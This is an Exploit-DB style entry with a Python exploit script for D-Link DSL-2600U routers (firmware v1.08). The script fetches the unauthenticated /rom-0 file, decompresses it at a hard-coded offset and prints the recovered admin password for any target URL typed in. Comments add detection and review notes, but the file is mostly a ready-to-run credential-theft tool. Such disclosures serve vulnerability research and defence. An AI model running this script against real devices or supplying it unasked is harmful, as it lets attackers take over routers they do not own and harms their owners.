D-Link DSL2600U - 'rom-0' Admin Password Disclosure

EDB-ID:

52576

CVE:

N/A




Platform:

Multiple

Date:

2026-05-26


# Exploit Title: D-Link DSL2600U - 'rom-0' Admin Password Disclosure
# Date: 2026-05-02
# Exploit Author: Amir Hossein Jamshidi
# Vendor Homepage: https://www.dlink.com
# Version: DSL-2600U
# Tested on: ubuntu
# CVE : N/A
# Firmware Version: v1.08
from routersploit.libs.lzs.lzs import LZSDecompress
import requests
import re
import sys
# Startup banner: tool title, author contact details and a usage hint.
# It sits outside the __main__ guard, so it is printed whenever this module
# is loaded, including on import.
_BANNER = '''
    #################################################################################
    #        D-Link Router - 'rom-0' Admin Password Disclosure                      #
    #                   BY: Amir Hossein Jamshidi                                   #
    #               Mail: amirhosseinjamshidi64@gmail.com                           #
    #           github: https://github.com/amirhosseinjamshidi64                    #
    #                    Usage: python expoit.py                                    #
    #################################################################################
'''
print(_BANNER)
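def exploit(url):
    """Fetch ``<url>/rom-0`` and return the first printable string inside it.

    The request is a plain GET with no credentials, cookies or session, so a
    device that answers it is serving this file to any client that can reach
    its web interface. For defenders this gives two checks: an
    unauthenticated GET of ``/rom-0`` should be refused, and requests for
    ``/rom-0`` in web or proxy logs are a detection signal.

    Args:
        url: Base URL of the device's web interface, for example
            ``http://192.168.1.1``. It is interpolated as given, so it
            should carry a scheme and no trailing slash.

    Returns:
        The first run of five or more printable ASCII characters in the
        decompressed data. NOTE(review): the caller reports this as the
        admin password; that the first printable run is the password is an
        assumption tied to the tested device and should be confirmed.

    Raises:
        requests.RequestException: The request failed, timed out, or the
            device answered with an HTTP error status.
        IndexError: The response is too short to reach the compressed
            section, or no printable run was found after decompression.
    """
    # Hard-coded offset at which the LZS-compressed section is expected to
    # start. Presumably specific to the firmware named in the file header
    # (v1.08); confirm before relying on a result from another build.
    offset = 8568

    # Bound the wait: without a timeout an unresponsive host blocks forever.
    response = requests.get(f"{url}/rom-0", timeout=10)
    # An error page is not a rom-0 image; decompressing it would only yield
    # a meaningless "password", so stop on any HTTP error status.
    response.raise_for_status()

    body = response.content
    if len(body) <= offset:
        raise IndexError(
            f"response is {len(body)} bytes, shorter than the expected "
            f"offset {offset}; not a usable rom-0 image"
        )

    # LZSDecompress returns the decompressed data and a second value that
    # this function does not use.
    text, _window = LZSDecompress(body[offset:])

    # \040-\176 are octal escapes for space through '~', i.e. printable ASCII.
    candidates = re.findall("([\040-\176]{5,})", text)
    if not candidates:
        # Same exception type the bare candidates[0] lookup would raise,
        # but with a message that says what went wrong.
        raise IndexError("no printable string found in the decompressed data")
    return candidates[0]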
if __name__ == "__main__":
    # Interactive entry point: read the device's base URL from stdin and
    # print whatever exploit() returns.
    # The value is written to the terminal in clear text, so it also ends up
    # in any captured console output or scrollback.
    target = input("Enter Target IP (example: http://192.168.1.1): ")
    recovered = exploit(target)
    print(f"password is: \t{recovered}")